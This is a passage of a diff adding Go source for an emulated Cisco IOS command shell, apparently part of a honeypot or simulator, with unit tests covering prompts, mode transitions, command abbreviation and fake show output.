}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestResolveCommandWithArgs(t *testing.T) {
|
||||||
|
// "hostname MyRouter" → resolved=["hostname"], args=["MyRouter"]
|
||||||
|
resolved, args, err := resolveCommand([]string{"hostname", "MyRouter"}, globalConfigCommands)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if len(resolved) != 1 || resolved[0] != "hostname" {
|
||||||
|
t.Errorf("resolved = %v, want [hostname]", resolved)
|
||||||
|
}
|
||||||
|
if len(args) != 1 || args[0] != "MyRouter" {
|
||||||
|
t.Errorf("args = %v, want [MyRouter]", args)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestResolveCommandAmbiguous(t *testing.T) {
|
||||||
|
// In user exec, "e" matches "enable" and "exit" — ambiguous
|
||||||
|
_, _, err := resolveCommand([]string{"e"}, userExecCommands)
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected ambiguous error")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Mode state machine tests ---
|
||||||
|
|
||||||
|
func TestPromptGeneration(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
mode iosMode
|
||||||
|
want string
|
||||||
|
}{
|
||||||
|
{modeUserExec, "Router>"},
|
||||||
|
{modePrivilegedExec, "Router#"},
|
||||||
|
{modeGlobalConfig, "Router(config)#"},
|
||||||
|
{modeInterfaceConfig, "Router(config-if)#"},
|
||||||
|
}
|
||||||
|
for _, tt := range tests {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
s.mode = tt.mode
|
||||||
|
if got := s.prompt(); got != tt.want {
|
||||||
|
t.Errorf("prompt(%d) = %q, want %q", tt.mode, got, tt.want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestPromptAfterHostnameChange(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
s.mode = modeGlobalConfig
|
||||||
|
s.dispatch("hostname Switch1")
|
||||||
|
if s.hostname != "Switch1" {
|
||||||
|
t.Fatalf("hostname = %q, want %q", s.hostname, "Switch1")
|
||||||
|
}
|
||||||
|
if got := s.prompt(); got != "Switch1(config)#" {
|
||||||
|
t.Errorf("prompt = %q, want %q", got, "Switch1(config)#")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestModeTransitions(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
|
||||||
|
// Start in user exec.
|
||||||
|
if s.mode != modeUserExec {
|
||||||
|
t.Fatalf("initial mode = %d, want %d", s.mode, modeUserExec)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Can't skip to config mode directly from user exec.
|
||||||
|
result := s.dispatch("configure terminal")
|
||||||
|
if result.output == "" {
|
||||||
|
t.Error("expected error for conf t in user exec mode")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Manually set privileged mode (enable tested separately).
|
||||||
|
s.mode = modePrivilegedExec
|
||||||
|
|
||||||
|
// conf t → global config
|
||||||
|
s.dispatch("configure terminal")
|
||||||
|
if s.mode != modeGlobalConfig {
|
||||||
|
t.Errorf("mode after conf t = %d, want %d", s.mode, modeGlobalConfig)
|
||||||
|
}
|
||||||
|
|
||||||
|
// interface Gi0/0 → interface config
|
||||||
|
s.dispatch("interface GigabitEthernet0/0")
|
||||||
|
if s.mode != modeInterfaceConfig {
|
||||||
|
t.Errorf("mode after interface = %d, want %d", s.mode, modeInterfaceConfig)
|
||||||
|
}
|
||||||
|
|
||||||
|
// exit → back to global config
|
||||||
|
s.dispatch("exit")
|
||||||
|
if s.mode != modeGlobalConfig {
|
||||||
|
t.Errorf("mode after exit from if-config = %d, want %d", s.mode, modeGlobalConfig)
|
||||||
|
}
|
||||||
|
|
||||||
|
// end → back to privileged exec
|
||||||
|
s.dispatch("end")
|
||||||
|
if s.mode != modePrivilegedExec {
|
||||||
|
t.Errorf("mode after end = %d, want %d", s.mode, modePrivilegedExec)
|
||||||
|
}
|
||||||
|
|
||||||
|
// disable → back to user exec
|
||||||
|
s.dispatch("disable")
|
||||||
|
if s.mode != modeUserExec {
|
||||||
|
t.Errorf("mode after disable = %d, want %d", s.mode, modeUserExec)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestEndFromInterfaceConfig(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
s.mode = modeInterfaceConfig
|
||||||
|
s.currentIf = "GigabitEthernet0/0"
|
||||||
|
|
||||||
|
s.dispatch("end")
|
||||||
|
if s.mode != modePrivilegedExec {
|
||||||
|
t.Errorf("mode after end = %d, want %d", s.mode, modePrivilegedExec)
|
||||||
|
}
|
||||||
|
if s.currentIf != "" {
|
||||||
|
t.Errorf("currentIf = %q, want empty", s.currentIf)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestExitFromPrivilegedExec(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
s.mode = modePrivilegedExec
|
||||||
|
result := s.dispatch("exit")
|
||||||
|
if !result.exit {
|
||||||
|
t.Error("expected exit=true from privileged exec exit")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Show command output tests ---
|
||||||
|
|
||||||
|
func TestShowVersionContainsModel(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
output := showVersion(s)
|
||||||
|
if !contains(output, "C2960") {
|
||||||
|
t.Error("show version missing model")
|
||||||
|
}
|
||||||
|
if !contains(output, "15.0(2)SE11") {
|
||||||
|
t.Error("show version missing IOS version")
|
||||||
|
}
|
||||||
|
if !contains(output, "Router") {
|
||||||
|
t.Error("show version missing hostname")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestShowRunningConfigContainsInterfaces(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
output := showRunningConfig(s)
|
||||||
|
if !contains(output, "hostname Router") {
|
||||||
|
t.Error("running-config missing hostname")
|
||||||
|
}
|
||||||
|
if !contains(output, "interface GigabitEthernet0/0") {
|
||||||
|
t.Error("running-config missing interface")
|
||||||
|
}
|
||||||
|
if !contains(output, "ip address 192.168.1.1") {
|
||||||
|
t.Error("running-config missing IP address")
|
||||||
|
}
|
||||||
|
if !contains(output, "line vty") {
|
||||||
|
t.Error("running-config missing VTY config")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestShowRunningConfigWithEnableSecret(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "secret123")
|
||||||
|
output := showRunningConfig(s)
|
||||||
|
if !contains(output, "enable secret") {
|
||||||
|
t.Error("running-config missing enable secret when password is set")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestShowRunningConfigWithoutEnableSecret(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
output := showRunningConfig(s)
|
||||||
|
if contains(output, "enable secret") {
|
||||||
|
t.Error("running-config should not have enable secret when password is empty")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestShowIPInterfaceBrief(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
output := showIPInterfaceBrief(s)
|
||||||
|
if !contains(output, "GigabitEthernet0/0") {
|
||||||
|
t.Error("ip interface brief missing GigabitEthernet0/0")
|
||||||
|
}
|
||||||
|
if !contains(output, "192.168.1.1") {
|
||||||
|
t.Error("ip interface brief missing 192.168.1.1")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestShowIPRoute(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
output := showIPRoute(s)
|
||||||
|
if !contains(output, "directly connected") {
|
||||||
|
t.Error("ip route missing connected routes")
|
||||||
|
}
|
||||||
|
if !contains(output, "0.0.0.0/0") {
|
||||||
|
t.Error("ip route missing default route")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestShowVLANBrief(t *testing.T) {
|
||||||
|
output := showVLANBrief()
|
||||||
|
if !contains(output, "default") {
|
||||||
|
t.Error("vlan brief missing default vlan")
|
||||||
|
}
|
||||||
|
if !contains(output, "MGMT") {
|
||||||
|
t.Error("vlan brief missing MGMT vlan")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Interface config tests ---
|
||||||
|
|
||||||
|
func TestInterfaceShutdownNoShutdown(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
s.mode = modeInterfaceConfig
|
||||||
|
s.currentIf = "GigabitEthernet0/0"
|
||||||
|
|
||||||
|
s.dispatch("shutdown")
|
||||||
|
iface := s.findInterface("GigabitEthernet0/0")
|
||||||
|
if iface == nil {
|
||||||
|
t.Fatal("interface not found")
|
||||||
|
}
|
||||||
|
if !iface.shutdown {
|
||||||
|
t.Error("interface should be shutdown")
|
||||||
|
}
|
||||||
|
if iface.status != "administratively down" {
|
||||||
|
t.Errorf("status = %q, want %q", iface.status, "administratively down")
|
||||||
|
}
|
||||||
|
|
||||||
|
s.dispatch("no shutdown")
|
||||||
|
if iface.shutdown {
|
||||||
|
t.Error("interface should not be shutdown after no shutdown")
|
||||||
|
}
|
||||||
|
if iface.status != "up" {
|
||||||
|
t.Errorf("status = %q, want %q", iface.status, "up")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestInterfaceIPAddress(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
s.mode = modeInterfaceConfig
|
||||||
|
s.currentIf = "GigabitEthernet0/0"
|
||||||
|
|
||||||
|
s.dispatch("ip address 10.10.10.1 255.255.255.0")
|
||||||
|
iface := s.findInterface("GigabitEthernet0/0")
|
||||||
|
if iface == nil {
|
||||||
|
t.Fatal("interface not found")
|
||||||
|
}
|
||||||
|
if iface.ip != "10.10.10.1" {
|
||||||
|
t.Errorf("ip = %q, want %q", iface.ip, "10.10.10.1")
|
||||||
|
}
|
||||||
|
if iface.mask != "255.255.255.0" {
|
||||||
|
t.Errorf("mask = %q, want %q", iface.mask, "255.255.255.0")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Dispatch / invalid command tests ---
|
||||||
|
|
||||||
|
func TestInvalidCommandInUserExec(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
result := s.dispatch("foobar")
|
||||||
|
if !contains(result.output, "Invalid input") {
|
||||||
|
t.Errorf("expected invalid input error, got %q", result.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestAmbiguousCommandOutput(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
// "e" in user exec is ambiguous (enable, exit)
|
||||||
|
result := s.dispatch("e")
|
||||||
|
if !contains(result.output, "Ambiguous") {
|
||||||
|
t.Errorf("expected ambiguous error, got %q", result.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestHelpCommand(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
result := s.dispatch("?")
|
||||||
|
if !contains(result.output, "show") {
|
||||||
|
t.Error("help missing 'show'")
|
||||||
|
}
|
||||||
|
if !contains(result.output, "enable") {
|
||||||
|
t.Error("help missing 'enable'")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Abbreviation integration tests ---
|
||||||
|
|
||||||
|
func TestShowAbbreviationInDispatch(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
s.mode = modePrivilegedExec
|
||||||
|
result := s.dispatch("sh ver")
|
||||||
|
if !contains(result.output, "Cisco IOS Software") {
|
||||||
|
t.Error("'sh ver' should produce version output")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestConfTAbbreviation(t *testing.T) {
|
||||||
|
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
|
||||||
|
s.mode = modePrivilegedExec
|
||||||
|
s.dispatch("conf t")
|
||||||
|
if s.mode != modeGlobalConfig {
|
||||||
|
t.Errorf("mode after conf t = %d, want %d", s.mode, modeGlobalConfig)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Enable command detection ---
|
||||||
|
|
||||||
|
func TestIsEnableCommand(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
input string
|
||||||
|
want bool
|
||||||
|
}{
|
||||||
|
{"enable", true},
|
||||||
|
{"en", true},
|
||||||
|
{"ena", true},
|
||||||
|
{"e", false}, // too short (single char could be other commands)
|
||||||
|
{"enab", true},
|
||||||
|
{"ENABLE", true},
|
||||||
|
{"exit", false},
|
||||||
|
{"enable 15", false}, // has extra argument
|
||||||
|
}
|
||||||
|
for _, tt := range tests {
|
||||||
|
if got := isEnableCommand(tt.input); got != tt.want {
|
||||||
|
t.Errorf("isEnableCommand(%q) = %v, want %v", tt.input, got, tt.want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- configString tests ---
|
||||||
|
|
||||||
|
func TestConfigString(t *testing.T) {
|
||||||
|
cfg := map[string]any{"hostname": "MySwitch"}
|
||||||
|
if got := configString(cfg, "hostname", "Router"); got != "MySwitch" {
|
||||||
|
t.Errorf("configString() = %q, want %q", got, "MySwitch")
|
||||||
|
}
|
||||||
|
if got := configString(cfg, "missing", "Default"); got != "Default" {
|
||||||
|
t.Errorf("configString() for missing = %q, want %q", got, "Default")
|
||||||
|
}
|
||||||
|
if got := configString(nil, "key", "Default"); got != "Default" {
|
||||||
|
t.Errorf("configString(nil) = %q, want %q", got, "Default")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Helper ---
|
||||||
|
|
||||||
|
func TestMaskBits(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
mask string
|
||||||
|
want int
|
||||||
|
}{
|
||||||
|
{"255.255.255.0", 24},
|
||||||
|
{"255.255.255.252", 30},
|
||||||
|
{"255.255.0.0", 16},
|
||||||
|
{"255.0.0.0", 8},
|
||||||
|
}
|
||||||
|
for _, tt := range tests {
|
||||||
|
if got := maskBits(tt.mask); got != tt.want {
|
||||||
|
t.Errorf("maskBits(%q) = %d, want %d", tt.mask, got, tt.want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNetworkFromIP(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
ip, mask, want string
|
||||||
|
}{
|
||||||
|
{"192.168.1.1", "255.255.255.0", "192.168.1.0"},
|
||||||
|
{"10.0.0.1", "255.255.255.252", "10.0.0.0"},
|
||||||
|
{"172.16.5.100", "255.255.0.0", "172.16.0.0"},
|
||||||
|
}
|
||||||
|
for _, tt := range tests {
|
||||||
|
if got := networkFromIP(tt.ip, tt.mask); got != tt.want {
|
||||||
|
t.Errorf("networkFromIP(%q, %q) = %q, want %q", tt.ip, tt.mask, got, tt.want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Shell metadata ---
|
||||||
|
|
||||||
|
func TestShellNameAndDescription(t *testing.T) {
|
||||||
|
s := NewCiscoShell()
|
||||||
|
if s.Name() != "cisco" {
|
||||||
|
t.Errorf("Name() = %q, want %q", s.Name(), "cisco")
|
||||||
|
}
|
||||||
|
if s.Description() == "" {
|
||||||
|
t.Error("Description() should not be empty")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func contains(s, substr string) bool {
|
||||||
|
return len(s) >= len(substr) && containsHelper(s, substr)
|
||||||
|
}
|
||||||
|
|
||||||
|
func containsHelper(s, substr string) bool {
|
||||||
|
for i := 0; i <= len(s)-len(substr); i++ {
|
||||||
|
if s[i:i+len(substr)] == substr {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return false
|
||||||
|
}
|
||||||
414
internal/shell/cisco/commands.go
Normal file
414
internal/shell/cisco/commands.go
Normal file
@@ -0,0 +1,414 @@
|
|||||||
|
package cisco
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
)
|
||||||
|
|
||||||
|
// commandResult holds the output of a command and whether the session should end.
|
||||||
|
type commandResult struct {
|
||||||
|
output string
|
||||||
|
exit bool
|
||||||
|
}
|
||||||
|
|
||||||
|
// commandEntry defines a single command with its name and optional sub-commands.
|
||||||
|
type commandEntry struct {
|
||||||
|
name string
|
||||||
|
subs []commandEntry // nil for leaf commands
|
||||||
|
}
|
||||||
|
|
||||||
|
// userExecCommands defines the command tree for user EXEC mode.
|
||||||
|
var userExecCommands = []commandEntry{
|
||||||
|
{name: "show", subs: []commandEntry{
|
||||||
|
{name: "version"},
|
||||||
|
{name: "clock"},
|
||||||
|
{name: "ip", subs: []commandEntry{
|
||||||
|
{name: "route"},
|
||||||
|
{name: "interface", subs: []commandEntry{
|
||||||
|
{name: "brief"},
|
||||||
|
}},
|
||||||
|
}},
|
||||||
|
{name: "interfaces"},
|
||||||
|
{name: "vlan", subs: []commandEntry{
|
||||||
|
{name: "brief"},
|
||||||
|
}},
|
||||||
|
}},
|
||||||
|
{name: "enable"},
|
||||||
|
{name: "exit"},
|
||||||
|
{name: "?"},
|
||||||
|
}
|
||||||
|
|
||||||
|
// privilegedExecCommands extends user commands for privileged mode.
|
||||||
|
var privilegedExecCommands = []commandEntry{
|
||||||
|
{name: "show", subs: []commandEntry{
|
||||||
|
{name: "version"},
|
||||||
|
{name: "clock"},
|
||||||
|
{name: "ip", subs: []commandEntry{
|
||||||
|
{name: "route"},
|
||||||
|
{name: "interface", subs: []commandEntry{
|
||||||
|
{name: "brief"},
|
||||||
|
}},
|
||||||
|
}},
|
||||||
|
{name: "interfaces"},
|
||||||
|
{name: "running-config"},
|
||||||
|
{name: "startup-config"},
|
||||||
|
{name: "vlan", subs: []commandEntry{
|
||||||
|
{name: "brief"},
|
||||||
|
}},
|
||||||
|
}},
|
||||||
|
{name: "configure", subs: []commandEntry{
|
||||||
|
{name: "terminal"},
|
||||||
|
}},
|
||||||
|
{name: "write", subs: []commandEntry{
|
||||||
|
{name: "memory"},
|
||||||
|
}},
|
||||||
|
{name: "copy"},
|
||||||
|
{name: "reload"},
|
||||||
|
{name: "disable"},
|
||||||
|
{name: "terminal", subs: []commandEntry{
|
||||||
|
{name: "length"},
|
||||||
|
}},
|
||||||
|
{name: "exit"},
|
||||||
|
{name: "?"},
|
||||||
|
}
|
||||||
|
|
||||||
|
// globalConfigCommands defines the command tree for global config mode.
|
||||||
|
var globalConfigCommands = []commandEntry{
|
||||||
|
{name: "hostname"},
|
||||||
|
{name: "interface"},
|
||||||
|
{name: "ip", subs: []commandEntry{
|
||||||
|
{name: "route"},
|
||||||
|
}},
|
||||||
|
{name: "no"},
|
||||||
|
{name: "end"},
|
||||||
|
{name: "exit"},
|
||||||
|
{name: "?"},
|
||||||
|
}
|
||||||
|
|
||||||
|
// interfaceConfigCommands defines the command tree for interface config mode.
|
||||||
|
var interfaceConfigCommands = []commandEntry{
|
||||||
|
{name: "ip", subs: []commandEntry{
|
||||||
|
{name: "address"},
|
||||||
|
}},
|
||||||
|
{name: "description"},
|
||||||
|
{name: "shutdown"},
|
||||||
|
{name: "no", subs: []commandEntry{
|
||||||
|
{name: "shutdown"},
|
||||||
|
}},
|
||||||
|
{name: "switchport", subs: []commandEntry{
|
||||||
|
{name: "mode"},
|
||||||
|
}},
|
||||||
|
{name: "end"},
|
||||||
|
{name: "exit"},
|
||||||
|
{name: "?"},
|
||||||
|
}
|
||||||
|
|
||||||
|
// commandsForMode returns the command tree for the given IOS mode.
|
||||||
|
func commandsForMode(mode iosMode) []commandEntry {
|
||||||
|
switch mode {
|
||||||
|
case modeUserExec:
|
||||||
|
return userExecCommands
|
||||||
|
case modePrivilegedExec:
|
||||||
|
return privilegedExecCommands
|
||||||
|
case modeGlobalConfig:
|
||||||
|
return globalConfigCommands
|
||||||
|
case modeInterfaceConfig:
|
||||||
|
return interfaceConfigCommands
|
||||||
|
default:
|
||||||
|
return userExecCommands
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// resolveAbbreviation attempts to match an abbreviated word against a list of
|
||||||
|
// command entries. It returns the matched entry name, or an error string if
|
||||||
|
// ambiguous or unknown.
|
||||||
|
func resolveAbbreviation(word string, entries []commandEntry) (string, error) {
|
||||||
|
word = strings.ToLower(word)
|
||||||
|
var matches []string
|
||||||
|
for _, e := range entries {
|
||||||
|
if strings.ToLower(e.name) == word {
|
||||||
|
return e.name, nil // exact match
|
||||||
|
}
|
||||||
|
if strings.HasPrefix(strings.ToLower(e.name), word) {
|
||||||
|
matches = append(matches, e.name)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
switch len(matches) {
|
||||||
|
case 0:
|
||||||
|
return "", fmt.Errorf("unknown")
|
||||||
|
case 1:
|
||||||
|
return matches[0], nil
|
||||||
|
default:
|
||||||
|
return "", fmt.Errorf("ambiguous")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// resolveCommand resolves a sequence of abbreviated words into the canonical
|
||||||
|
// command path (e.g., ["sh", "run"] → ["show", "running-config"]).
|
||||||
|
// It returns the resolved path, any remaining arguments, and an error if
|
||||||
|
// resolution fails.
|
||||||
|
func resolveCommand(words []string, entries []commandEntry) ([]string, []string, error) {
|
||||||
|
var resolved []string
|
||||||
|
current := entries
|
||||||
|
|
||||||
|
for i, w := range words {
|
||||||
|
name, err := resolveAbbreviation(w, current)
|
||||||
|
if err != nil {
|
||||||
|
if err.Error() == "unknown" && len(resolved) > 0 {
|
||||||
|
// Remaining words are arguments to the resolved command.
|
||||||
|
return resolved, words[i:], nil
|
||||||
|
}
|
||||||
|
return resolved, words[i:], err
|
||||||
|
}
|
||||||
|
resolved = append(resolved, name)
|
||||||
|
|
||||||
|
// Find sub-commands for the matched entry.
|
||||||
|
var nextLevel []commandEntry
|
||||||
|
for _, e := range current {
|
||||||
|
if e.name == name {
|
||||||
|
nextLevel = e.subs
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if nextLevel == nil {
|
||||||
|
// Leaf command — rest are arguments.
|
||||||
|
return resolved, words[i+1:], nil
|
||||||
|
}
|
||||||
|
current = nextLevel
|
||||||
|
}
|
||||||
|
return resolved, nil, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// dispatch processes a command line in the context of the current IOS state.
|
||||||
|
func (s *iosState) dispatch(input string) commandResult {
|
||||||
|
words := strings.Fields(input)
|
||||||
|
if len(words) == 0 {
|
||||||
|
return commandResult{}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Handle "?" as a help request.
|
||||||
|
if words[0] == "?" {
|
||||||
|
return s.cmdHelp()
|
||||||
|
}
|
||||||
|
|
||||||
|
cmds := commandsForMode(s.mode)
|
||||||
|
resolved, args, err := resolveCommand(words, cmds)
|
||||||
|
if err != nil {
|
||||||
|
if err.Error() == "ambiguous" {
|
||||||
|
return commandResult{output: fmt.Sprintf("%% Ambiguous command: \"%s\"", input)}
|
||||||
|
}
|
||||||
|
return commandResult{output: invalidInput(input)}
|
||||||
|
}
|
||||||
|
|
||||||
|
if len(resolved) == 0 {
|
||||||
|
return commandResult{output: invalidInput(input)}
|
||||||
|
}
|
||||||
|
|
||||||
|
cmd := strings.Join(resolved, " ")
|
||||||
|
|
||||||
|
switch s.mode {
|
||||||
|
case modeUserExec:
|
||||||
|
return s.dispatchUserExec(cmd, args)
|
||||||
|
case modePrivilegedExec:
|
||||||
|
return s.dispatchPrivilegedExec(cmd, args)
|
||||||
|
case modeGlobalConfig:
|
||||||
|
return s.dispatchGlobalConfig(cmd, args)
|
||||||
|
case modeInterfaceConfig:
|
||||||
|
return s.dispatchInterfaceConfig(cmd, args)
|
||||||
|
}
|
||||||
|
return commandResult{output: invalidInput(input)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *iosState) dispatchUserExec(cmd string, args []string) commandResult {
|
||||||
|
switch cmd {
|
||||||
|
case "show version":
|
||||||
|
return commandResult{output: showVersion(s)}
|
||||||
|
case "show clock":
|
||||||
|
return commandResult{output: showClock()}
|
||||||
|
case "show ip route":
|
||||||
|
return commandResult{output: showIPRoute(s)}
|
||||||
|
case "show ip interface brief":
|
||||||
|
return commandResult{output: showIPInterfaceBrief(s)}
|
||||||
|
case "show interfaces":
|
||||||
|
return commandResult{output: showInterfaces(s)}
|
||||||
|
case "show vlan brief":
|
||||||
|
return commandResult{output: showVLANBrief()}
|
||||||
|
case "enable":
|
||||||
|
return commandResult{} // handled in Handle() loop
|
||||||
|
case "exit":
|
||||||
|
return commandResult{exit: true}
|
||||||
|
}
|
||||||
|
return commandResult{output: invalidInput(cmd)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *iosState) dispatchPrivilegedExec(cmd string, args []string) commandResult {
|
||||||
|
switch cmd {
|
||||||
|
case "show version":
|
||||||
|
return commandResult{output: showVersion(s)}
|
||||||
|
case "show clock":
|
||||||
|
return commandResult{output: showClock()}
|
||||||
|
case "show ip route":
|
||||||
|
return commandResult{output: showIPRoute(s)}
|
||||||
|
case "show ip interface brief":
|
||||||
|
return commandResult{output: showIPInterfaceBrief(s)}
|
||||||
|
case "show interfaces":
|
||||||
|
return commandResult{output: showInterfaces(s)}
|
||||||
|
case "show running-config":
|
||||||
|
return commandResult{output: showRunningConfig(s)}
|
||||||
|
case "show startup-config":
|
||||||
|
return commandResult{output: showRunningConfig(s)} // same as running
|
||||||
|
case "show vlan brief":
|
||||||
|
return commandResult{output: showVLANBrief()}
|
||||||
|
case "configure terminal":
|
||||||
|
s.mode = modeGlobalConfig
|
||||||
|
return commandResult{output: "Enter configuration commands, one per line. End with CNTL/Z."}
|
||||||
|
case "write memory":
|
||||||
|
return commandResult{output: "[OK]"}
|
||||||
|
case "copy":
|
||||||
|
return commandResult{output: "[OK]"}
|
||||||
|
case "reload":
|
||||||
|
return commandResult{output: "System configuration has been modified. Save? [yes/no]: ", exit: true}
|
||||||
|
case "disable":
|
||||||
|
s.mode = modeUserExec
|
||||||
|
return commandResult{}
|
||||||
|
case "terminal length":
|
||||||
|
return commandResult{} // accept silently
|
||||||
|
case "exit":
|
||||||
|
return commandResult{exit: true}
|
||||||
|
}
|
||||||
|
return commandResult{output: invalidInput(cmd)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *iosState) dispatchGlobalConfig(cmd string, args []string) commandResult {
|
||||||
|
switch cmd {
|
||||||
|
case "hostname":
|
||||||
|
if len(args) < 1 {
|
||||||
|
return commandResult{output: "% Incomplete command."}
|
||||||
|
}
|
||||||
|
s.hostname = args[0]
|
||||||
|
return commandResult{}
|
||||||
|
case "interface":
|
||||||
|
if len(args) < 1 {
|
||||||
|
return commandResult{output: "% Incomplete command."}
|
||||||
|
}
|
||||||
|
ifName := strings.Join(args, "")
|
||||||
|
s.currentIf = ifName
|
||||||
|
s.mode = modeInterfaceConfig
|
||||||
|
return commandResult{}
|
||||||
|
case "ip route":
|
||||||
|
return commandResult{} // accept silently
|
||||||
|
case "no":
|
||||||
|
return commandResult{} // accept silently
|
||||||
|
case "end":
|
||||||
|
s.mode = modePrivilegedExec
|
||||||
|
return commandResult{}
|
||||||
|
case "exit":
|
||||||
|
s.mode = modePrivilegedExec
|
||||||
|
return commandResult{}
|
||||||
|
}
|
||||||
|
return commandResult{output: invalidInput(cmd)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *iosState) dispatchInterfaceConfig(cmd string, args []string) commandResult {
|
||||||
|
switch cmd {
|
||||||
|
case "ip address":
|
||||||
|
if len(args) < 2 {
|
||||||
|
return commandResult{output: "% Incomplete command."}
|
||||||
|
}
|
||||||
|
if iface := s.findInterface(s.currentIf); iface != nil {
|
||||||
|
iface.ip = args[0]
|
||||||
|
iface.mask = args[1]
|
||||||
|
}
|
||||||
|
return commandResult{}
|
||||||
|
case "description":
|
||||||
|
if len(args) < 1 {
|
||||||
|
return commandResult{output: "% Incomplete command."}
|
||||||
|
}
|
||||||
|
if iface := s.findInterface(s.currentIf); iface != nil {
|
||||||
|
iface.desc = strings.Join(args, " ")
|
||||||
|
}
|
||||||
|
return commandResult{}
|
||||||
|
case "shutdown":
|
||||||
|
if iface := s.findInterface(s.currentIf); iface != nil {
|
||||||
|
iface.shutdown = true
|
||||||
|
iface.status = "administratively down"
|
||||||
|
iface.protocol = "down"
|
||||||
|
}
|
||||||
|
return commandResult{}
|
||||||
|
case "no shutdown":
|
||||||
|
if iface := s.findInterface(s.currentIf); iface != nil {
|
||||||
|
iface.shutdown = false
|
||||||
|
iface.status = "up"
|
||||||
|
iface.protocol = "up"
|
||||||
|
}
|
||||||
|
return commandResult{}
|
||||||
|
case "switchport mode":
|
||||||
|
return commandResult{} // accept silently
|
||||||
|
case "end":
|
||||||
|
s.mode = modePrivilegedExec
|
||||||
|
s.currentIf = ""
|
||||||
|
return commandResult{}
|
||||||
|
case "exit":
|
||||||
|
s.mode = modeGlobalConfig
|
||||||
|
s.currentIf = ""
|
||||||
|
return commandResult{}
|
||||||
|
}
|
||||||
|
